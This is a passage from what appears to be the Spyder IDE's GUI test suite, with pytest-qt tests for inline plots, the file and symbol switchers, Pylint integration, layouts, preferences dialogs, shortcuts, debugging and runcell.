    # then save it to a file.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
    qimg = shell._get_image(img_name)
    assert isinstance(qimg, QImage)
    # Save the inline figure and assert it is similar to the one generated
    # with savefig.
    inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
    qimg.save(inline_figname)
    assert compare_images(savefig_figname, inline_figname, 0.1) is None
    # Change the option so that bbox_inches=None.
    CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
    # Restart the kernel so the new inline option takes effect, and wait
    # until it's up again.
    shell._prompt_html = None
    client.restart_kernel()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Generate the same plot inline, now comparing against a savefig with
    # bbox_inches=None.
    savefig_figname = osp.join(
        tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig, ax = plt.subplots()\n"
                       "fig.set_size_inches(%f, %f)\n"
                       "ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
                       "ax.set_xticks(range(10))\n"
                       "ax.xaxis.set_ticklabels([])\n"
                       "ax.set_yticks(range(10))\n"
                       "ax.yaxis.set_ticklabels([])\n"
                       "ax.tick_params(axis='both', length=0)\n"
                       "for loc in ax.spines:\n"
                       "    ax.spines[loc].set_color('#000000')\n"
                       "    ax.spines[loc].set_linewidth(2)\n"
                       "ax.axis([0, 9, 0, 9])\n"
                       "ax.plot(range(10), color='#000000', lw=2)\n"
                       "fig.savefig('%s',\n"
                       "            bbox_inches=None,\n"
                       "            dpi=%f)"
                       ) % (fig_width, fig_height, savefig_figname, fig_dpi))
    # Get the image name from the html, fetch the image from the shell, and
    # then save it to a file.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
    qimg = shell._get_image(img_name)
    assert isinstance(qimg, QImage)
    # Save the inline figure and assert it is similar to the one generated
    # with savefig.
    inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
    qimg.save(inline_figname)
    assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
    """Test the use of shorten paths when necessary in the switcher."""
    switcher = main_window.switcher
    # Assert that the full path of a file is shown in the switcher
    file_a = tmpdir.join('test_file_a.py')
    file_a.write('''
def example_def():
    pass
def example_def_2():
    pass
''')
    main_window.editor.load(str(file_a))
    main_window.open_switcher()
    switcher_paths = [switcher.model.item(item_idx).get_description()
                      for item_idx in range(switcher.model.rowCount())]
    # Short paths are shown in full; paths longer than 75 chars may already
    # be elided, so accept either case.
    assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
    switcher.close()
    # Assert that long paths are shortened in the switcher. Three nested
    # uuid4-named directories guarantee a path long enough to be elided.
    dir_b = tmpdir
    for _ in range(3):
        dir_b = dir_b.mkdir(str(uuid.uuid4()))
    file_b = dir_b.join('test_file_b.py')
    file_b.write('bar\n')
    main_window.editor.load(str(file_b))
    main_window.open_switcher()
    file_b_text = switcher.model.item(
        switcher.model.rowCount() - 1).get_description()
    assert '...' in file_b_text
    switcher.close()
    # Assert search works correctly: a match yields exactly one row, no
    # match yields zero.
    search_texts = ['test_file_a', 'file_b', 'foo_spam']
    expected_paths = [file_a, file_b, None]
    for search_text, expected_path in zip(search_texts, expected_paths):
        main_window.open_switcher()
        qtbot.keyClicks(switcher.edit, search_text)
        qtbot.wait(200)
        assert switcher.count() == bool(expected_path)
        switcher.close()
    # Assert symbol switcher works
    main_window.editor.set_current_filename(str(file_a))
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()
    qtbot.wait(9000)
    main_window.open_switcher()
    # '@' switches to symbol mode; file_a defines exactly two functions.
    qtbot.keyClicks(switcher.edit, '@')
    qtbot.wait(200)
    assert switcher.count() == 2
    switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
    """
    Test that the file switcher is working as expected when called from the
    editorstack.
    Regression test for spyder-ide/spyder#10684
    """
    # Put a small file into the editor so the switcher has an entry to show.
    tmp_file = tmpdir.join('test_file_open_switcher_dlg.py')
    tmp_file.write("a test file for test_edidorstack_open_switcher_dlg")
    main_window.editor.load(str(tmp_file))
    # The switcher dialog must not exist before it is explicitly opened.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.switcher_dlg is None
    # After opening, the dialog exists, is visible, and lists one entry per
    # open file.
    editorstack.open_switcher_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    open_filenames = main_window.editor.get_filenames()
    assert editorstack.switcher_dlg.count() == len(open_filenames)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
    """
    Test that the symbol finder is working as expected when called from the
    editorstack.
    Regression test for spyder-ide/spyder#10684
    """
    # Add a file to the editor.
    file = tmpdir.join('test_file.py')
    file.write('''
def example_def():
    pass
def example_def_2():
    pass
''')
    main_window.editor.load(str(file))
    # Wait for the LSP to open the document and compute its symbols.
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()
    qtbot.wait(5000)
    # Test that the symbol finder opens as expected from the editorstack.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.switcher_dlg is None
    editorstack.open_symbolfinder_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    # The file defines exactly two symbols (the two functions above).
    assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
    """This tests that the Pylint plugin is working as expected."""
    from spyder.plugins.pylint.main_widget import PylintWidgetActions
    # Select the third-party plugin
    pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
    # Do an analysis
    test_file = osp.join(LOCATION, 'script_pylint.py')
    main_window.editor.load(test_file)
    pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
    qtbot.wait(3000)
    # Perform the test
    # Check output of the analysis
    treewidget = pylint_plugin.get_widget().get_focus_widget()
    qtbot.waitUntil(lambda: treewidget.results is not None,
                    timeout=SHELL_TIMEOUT)
    result_content = treewidget.results
    assert result_content['C:']
    # The number of convention ('C:') messages emitted for script_pylint.py
    # depends on the installed Pylint version.
    pylint_version = parse_version(pylint.__version__)
    if pylint_version < parse_version('2.5.0'):
        number_of_conventions = 5
    else:
        number_of_conventions = 3
    assert len(result_content['C:']) == number_of_conventions
    # Close the file
    main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
    """Test that the troubleshooting menu item calls the valid URL."""
    application_plugin = main_window.application
    # Patch QDesktopServices where the action's handler looks it up so the
    # test does not actually open a browser.
    MockQDesktopServices = Mock()
    attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
    monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
    # Unit test of help menu item: Make sure the correct URL is called.
    application_plugin.trouble_action.trigger()
    # Bug fix: the original code called `called_once_with` on an instance
    # mock — that is not a Mock assertion method; it silently creates a new
    # child mock and is always truthy, so nothing was actually checked.
    # `openUrl` is invoked on the (patched) class itself, so assert there.
    MockQDesktopServices.openUrl.assert_called_once()
    # The single call should have received the troubleshooting URL
    # (wrapped in a QUrl by the handler) — TODO confirm the exact wrapper
    # type if this assertion is ever tightened to assert_called_once_with.
    (url_arg,), _kwargs = MockQDesktopServices.openUrl.call_args
    assert __trouble_url__ in repr(url_arg) or url_arg == __trouble_url__
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
    """
    Test fix for spyder-ide/spyder#6317.
    'Show tutorial' opens the help plugin if closed.

    Covers three starting states: Help closed, Help open but another tab
    selected, and Help already the active tab.
    """
    HELP_STR = "Help"
    # Find the Help entry in the Panes menu.
    help_pane_menuitem = None
    for action in main_window.layouts.plugins_menu.get_actions():
        if action.text() == HELP_STR:
            help_pane_menuitem = action
            break
    # Test opening tutorial with Help plugin closed
    main_window.help.toggle_view_action.setChecked(False)
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert help_tabbar is None and help_index is None
    assert not isinstance(main_window.focusWidget(), ObjectComboBox)
    assert not help_pane_menuitem.isChecked()
    main_window.help.show_tutorial()
    qtbot.wait(500)
    # Help must now exist, be the current tab, and be checked in the menu.
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()
    # Test opening tutorial with help plugin open, but not selected
    help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
                                % help_tabbar.count())
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index != help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()
    main_window.help.show_tutorial()
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()
    # Test opening tutorial with help plugin open and the active tab
    qtbot.wait(500)
    main_window.help.show_tutorial()
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
    qtbot.wait(500)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
    """Test that the report error dialog opens correctly."""
    main_window.console.report_issue()
    qtbot.wait(300)
    # The report dialog is kept as a private attribute of the console
    # widget; it must exist, be visible, and accept being closed.
    report_dialog = main_window.console.get_widget()._report_dlg
    assert report_dialog is not None
    assert report_dialog.isVisible()
    assert report_dialog.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
    """Test that layout are showing the expected widgets visible."""
    mw = main_window
    mw.first_spyder_run = False
    prefix = 'window' + '/'
    settings = mw.layouts.load_window_settings(prefix=prefix, default=True)
    # Test layout changes: apply every default layout and verify visibility.
    for layout_idx in get_class_values(DefaultLayouts):
        with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
            layout = mw.layouts.setup_default_layouts(
                layout_idx, settings=settings)
        with qtbot.waitSignal(None, timeout=500, raising=False):
            # Add a wait to see changes
            pass
        # Every plugin placed in a visible area and not explicitly hidden
        # must end up with a visible widget.
        for area in layout._areas:
            if area['visible']:
                for plugin_id in area['plugin_ids']:
                    if plugin_id not in area['hidden_plugin_ids']:
                        plugin = mw.get_plugin(plugin_id)
                        print(plugin)  # spyder: test-skip
                        try:
                            # New API
                            assert plugin.get_widget().isVisible()
                        except AttributeError:
                            # Old API
                            assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    sys.platform.startswith('linux'), reason="Fake plugin registration fails")
def test_programmatic_custom_layouts(main_window, qtbot):
    """
    Test that a custom layout gets registered and it is recognized.

    The 'testing layout' is registered by the spyder_boilerplate testing
    plugin; switching to it must leave its plugins visible.
    """
    mw = main_window
    mw.first_spyder_run = False
    # Test layout registration
    layout_id = 'testing layout'
    # Test the testing plugin is being loaded
    mw.get_plugin('spyder_boilerplate')
    # Get the registered layout
    layout = mw.layouts.get_layout(layout_id)
    with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
        mw.layouts.quick_layout_switch(layout_id)
    with qtbot.waitSignal(None, timeout=500, raising=False):
        # Add a wait to see changes
        pass
    # Every plugin placed in a visible area and not explicitly hidden must
    # end up with a visible widget.
    for area in layout._areas:
        if area['visible']:
            for plugin_id in area['plugin_ids']:
                if plugin_id not in area['hidden_plugin_ids']:
                    plugin = mw.get_plugin(plugin_id)
                    print(plugin)  # spyder: test-skip
                    try:
                        # New API
                        assert plugin.get_widget().isVisible()
                    except AttributeError:
                        # Old API
                        assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
    """Test that unsaved editor changes are saved when calling runfile."""
    # Load test file (work on a copy so script.py itself is not modified)
    test_file = osp.join(LOCATION, 'script.py')
    test_file_copy = test_file[:-3] + '_copy.py'
    shutil.copyfile(test_file, test_file_copy)
    main_window.editor.load(test_file_copy)
    code_editor = main_window.editor.get_focus_widget()
    # Verify result
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Type an unsaved change into the editor; runfile must save it before
    # executing, so `test_var` becomes visible in the kernel namespace.
    qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
    filename = code_editor.filename
    with qtbot.waitSignal(shell.sig_prompt_ready):
        shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
    assert shell.get_value('test_var') == 123
    # Clean up the temporary copy.
    main_window.editor.close_file()
    os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
    """Test that file editor focus change updates pylint combobox filename."""
    # Find the Pylint third-party plugin; assumes it is registered —
    # a NameError below would signal it is missing.
    for plugin in main_window.thirdparty_plugins:
        if plugin.CONF_SECTION == 'pylint':
            pylint_plugin = plugin
            break
    # Show pylint plugin
    pylint_plugin.dockwidget.show()
    pylint_plugin.dockwidget.raise_()
    # Create base temporary directory
    basedir = tmpdir.mkdir('foo')
    # Open some files; the Pylint combobox must track the focused file.
    for idx in range(2):
        fh = basedir.join('{}.py'.format(idx))
        fname = str(fh)
        fh.write('print("Hello world!")')
        main_window.open_file(fh)
        qtbot.wait(200)
        assert fname == pylint_plugin.get_filename()
    # Create a editor split
    main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
    qtbot.wait(500)
    # Open other files (0 and 1 already exist; 2 and 3 are new) and check
    # the combobox still follows focus across the split.
    for idx in range(4):
        fh = basedir.join('{}.py'.format(idx))
        fh.write('print("Hello world!")')
        fname = str(fh)
        main_window.open_file(fh)
        qtbot.wait(200)
        assert fname == pylint_plugin.get_filename()
    # Close split panel (only the last editorstack; break after one).
    for editorstack in reversed(main_window.editor.editorstacks):
        editorstack.close_split()
        break
    qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
    """Test if a comms error is correctly displayed."""
    CONF.set('main', 'show_internal_errors', True)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Create a bogus get_cwd handler whose body raises (it imports a
    # missing module), so the next comms call to it fails on kernel side.
    with qtbot.waitSignal(shell.executed):
        shell.execute('def get_cwd(): import foo')
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm."
                      "register_call_handler('get_cwd', get_cwd)")
    # 'ls' triggers a get_cwd comms call, exercising the broken handler.
    with qtbot.waitSignal(shell.executed, timeout=3000):
        shell.execute('ls')
    # The failure must surface in the internal error dialog.
    error_dialog = main_window.console.error_dialog
    assert error_dialog is not None
    assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
    assert 'No module named' in error_dialog.error_traceback
    main_window.console.close_error_dialog()
    # Restore the default so later tests are unaffected.
    CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
    """Test that we can set breakpoints while running."""
    # Create loop: ~10 seconds of runtime, leaving ample time to add a
    # breakpoint while the code is executing.
    code = ("import time\n"
            "for i in range(100):\n"
            "    print(i)\n"
            "    time.sleep(0.1)\n"
            )
    p = tmpdir.join("loop_script.py")
    p.write(code)
    test_file = to_text_string(p)
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    # Load test file
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()
    # Click the debug button
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)
    # Continue debugging so the loop starts running freely.
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)
    qtbot.wait(500)
    with qtbot.waitSignal(shell.executed):
        # Set a breakpoint while the loop runs; execution should stop there
        # (note: `toogle_breakpoint` is the actual Spyder API spelling).
        code_editor.debugger.toogle_breakpoint(line_number=3)
    # We should drop into the debugger
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(shell._control, '!q')
        qtbot.keyClick(shell._control, Qt.Key_Enter)
    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
    """
    Open the Preferences dialog and switch to the page whose CONF_SECTION
    matches `section`.

    Returns a (dialog, page index, page widget) tuple so callers can
    interact with the selected page and close the dialog themselves.
    """
    main_window.show_preferences()
    dialog_container = main_window.preferences.get_container()
    # The dialog is created asynchronously; wait until it exists.
    qtbot.waitUntil(lambda: dialog_container.dialog is not None, timeout=5000)
    dlg = dialog_container.dialog
    page_index = dlg.get_index_by_name(section)
    selected_page = dlg.get_page(page_index)
    dlg.set_current_index(page_index)
    return dlg, page_index, selected_page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
    """
    Test for spyder-ide/spyder#13524 regression.
    Ensure the Run section exists.
    """
    # The helper returns a (dialog, index, page) tuple, which is truthy
    # whenever the 'run' page could be found and selected.
    result = preferences_dialog_helper(qtbot, main_window, 'run')
    assert result
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10139 regression.
    Enabling codestyle/docstyle on the completion section of preferences,
    was not updating correctly.
    """
    # Reset config so both options start disabled.
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)
    # Open completion prefences and update options
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'completions')
    # Get the correct tab pages inside the Completion preferences page
    tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
    tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
            for i in range(page.tabs.count())]
    tabs = dict(zip(tnames, tabs))
    # Map tab title -> name of the checkbox attribute on that tab widget.
    tab_widgets = {
        'code style and formatting': 'code_style_check',
        'docstring style': 'docstring_style_check'
    }
    # Click both checkboxes to enable the options.
    for tabname in tab_widgets:
        tab, idx = tabs[tabname]
        check_name = tab_widgets[tabname]
        check = getattr(tab, check_name)
        page.tabs.setCurrentIndex(idx)
        check.animateClick()
        qtbot.wait(500)
    # Accept the dialog and wait until it is destroyed.
    dlg.ok_btn.animateClick()
    preferences = main_window.preferences
    container = preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is None,
                    timeout=5000)
    # Check the menus are correctly updated: both Source-menu entries must
    # now be checked, and exactly two such entries must exist.
    count = 0
    for menu_item in main_window.source_menu_actions:
        if menu_item and isinstance(menu_item, QAction):
            print(menu_item.text(), menu_item.isChecked())
            if 'code style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
            elif 'docstring style' in menu_item.text():
                assert menu_item.isChecked()
                count += 1
    assert count == 2
    # Reset config to leave a clean state for later tests.
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pydocstyle'),
             False)
    CONF.set('completions',
             ('provider_configuration', 'lsp', 'values', 'pycodestyle'),
             False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#10284 regression.
    Changing font resulted in error.
    """
    dlg, index, page = preferences_dialog_helper(
        qtbot, main_window, 'appearance')
    # Bump both font selectors to the next available font; this used to
    # raise an error when the dialog was accepted.
    font_selectors = [page.plain_text_font.fontbox,
                      page.rich_text_font.fontbox]
    for selector in font_selectors:
        selector.setFocus()
        current = selector.currentIndex()
        selector.setCurrentIndex(current + 1)
    # Accept the dialog and wait until it has been destroyed.
    dlg.ok_btn.animateClick()
    container = main_window.preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
    not sys.platform.startswith('linux'),
    reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#12992 regression.
    Overwriting shortcuts results in a shortcuts conflict.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Setup shortcuts (set run cell and advance shortcut to run selection)
    base_run_cell_advance = CONF.get_shortcut(
        'editor', 'run cell and advance')  # Should be Shift+Return
    base_run_selection = CONF.get_shortcut(
        'editor', 'run selection')  # Should be F9
    assert base_run_cell_advance == 'Shift+Return'
    assert base_run_selection == 'F9'
    # Clear 'run cell and advance' and reassign its key to 'run selection';
    # this overwrite used to create a shortcut conflict.
    CONF.set_shortcut(
        'editor', 'run cell and advance', '')
    CONF.set_shortcut(
        'editor', 'run selection', base_run_cell_advance)
    main_window.shortcuts.apply_shortcuts()
    # Check execution of shortcut
    # Create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(u'print(0)\nprint(ññ)')
    # Shift+Return now runs the *selection* (first line only), so the
    # invalid second line must never reach the console.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
    assert u'ññ' not in shell._control.toPlainText()
    # Reset shortcuts
    CONF.set_shortcut(
        'editor', 'run selection', 'F9')
    CONF.set_shortcut(
        'editor', 'run cell and advance', 'Shift+Return')
    main_window.shortcuts.apply_shortcuts()
    qtbot.wait(500)  # Wait for shortcut change to actually be applied
    # Check shortcut run cell and advance reset: Shift+Return should now
    # run a cell again (runcell appears in the console).
    code_editor.setFocus()
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
    """
    Test for spyder-ide/spyder/#11132 regression.
    Resetting shortcut resulted in error.
    """
    # Open the Shortcuts page and reset everything to defaults; this used
    # to raise an error.
    dlg, index, page = preferences_dialog_helper(
        qtbot, main_window, 'shortcuts')
    page.reset_to_default(force=True)
    # Accept the dialog and wait until it has been destroyed.
    dlg.ok_btn.animateClick()
    container = main_window.preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
    """Test that on main interpreter change signal is emitted."""
    # Check original pyls configuration: no custom environment selected.
    lsp = main_window.completions.get_provider('lsp')
    config = lsp.generate_python_config()
    jedi = config['configurations']['pyls']['plugins']['jedi']
    assert jedi['environment'] is None
    assert jedi['extra_paths'] == []
    # Change main interpreter on preferences to a custom executable
    # (the current interpreter, which is always available).
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'main_interpreter')
    page.cus_exec_radio.setChecked(True)
    page.cus_exec_combo.combobox.setCurrentText(sys.executable)
    # Accepting the dialog must emit sig_main_interpreter_changed.
    with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
                          timeout=5000, raising=True):
        dlg.ok_btn.animateClick()
    # Check updated pyls configuration: jedi now uses the new interpreter.
    config = lsp.generate_python_config()
    jedi = config['configurations']['pyls']['plugins']['jedi']
    assert jedi['environment'] == sys.executable
    assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
    """Check that reopening Preferences restores the last visited page."""
    # Open the dialog on the main interpreter page and remember its index.
    dlg, index, page = preferences_dialog_helper(
        qtbot, main_window, 'main_interpreter')
    container = main_window.preferences.get_container()
    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)
    # Close the dialog.
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)
    # Reopen it and check the previously visited page is selected again.
    main_window.show_preferences()
    qtbot.waitUntil(lambda: container.dialog is not None, timeout=5000)
    dlg = container.dialog
    assert dlg.get_current_index() == index
    # Close the dialog again to leave a clean state.
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: container.dialog is None, timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
    """Test that go-to-definition works as expected."""
    # --- Code that gives no definition
    code_no_def = dedent("""
    from qtpy.QtCore import Qt
    Qt.FramelessWindowHint""")
    # Create new editor with code and wait until LSP is ready
    main_window.editor.new(text=code_no_def)
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()
    # Move cursor to the left one character to be next to
    # FramelessWindowHint
    code_editor.move_cursor(-1)
    with qtbot.waitSignal(
            code_editor.completions_response_signal):
        code_editor.go_to_definition_from_cursor()
    # Capture stderr and assert there are no errors (a failed lookup must
    # not print a traceback).
    sys_stream = capsys.readouterr()
    assert sys_stream.err == u''
    # --- Code that gives definition
    code_def = "import qtpy.QtCore"
    # Create new editor with code and wait until LSP is ready
    main_window.editor.new(text=code_def)
    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()
    # Move cursor to the left one character to be next to QtCore
    code_editor.move_cursor(-1)
    with qtbot.waitSignal(
            code_editor.completions_response_signal):
        code_editor.go_to_definition_from_cursor()
    def _get_filenames():
        # Basenames of every file currently open in the editor.
        return [osp.basename(f) for f in main_window.editor.get_filenames()]
    # Going to QtCore's definition should open QtCore.py in the editor.
    qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
    assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
                    reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
    """Test that we can debug an unsaved file."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Main variables
    control = shell._control
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()
    # create new file (never saved to disk)
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text('print(0)\nprint(1)\nprint(2)')
    # Set breakpoint on line 2 (note: `toogle_breakpoint` is the actual
    # Spyder API spelling).
    code_editor.debugger.toogle_breakpoint(line_number=2)
    qtbot.wait(500)
    # Start debugging
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    # There is a breakpoint, so it should continue
    qtbot.waitUntil(
        lambda: '!continue' in shell._control.toPlainText())
    # The debugger must stop on line 2, where the breakpoint was set.
    qtbot.waitUntil(
        lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
    "debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
    """Test the runcell command (and its debugcell variant)."""
    # Write code with a cell to a file
    code = u"result = 10; fname = __file__"
    p = tmpdir.join("cell-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    if debug:
        function = 'debugcell'
    else:
        function = 'runcell'
    # Execute runcell
    with qtbot.waitSignal(shell.executed):
        shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
    if debug:
        # Continue past the debugger prompt so the cell actually runs.
        shell.pdb_execute('!c')
    qtbot.wait(1000)
    # Verify that the `result` variable is defined
    assert shell.get_value('result') == 10
    # Verify that the `fname` variable is `cell-test.py`
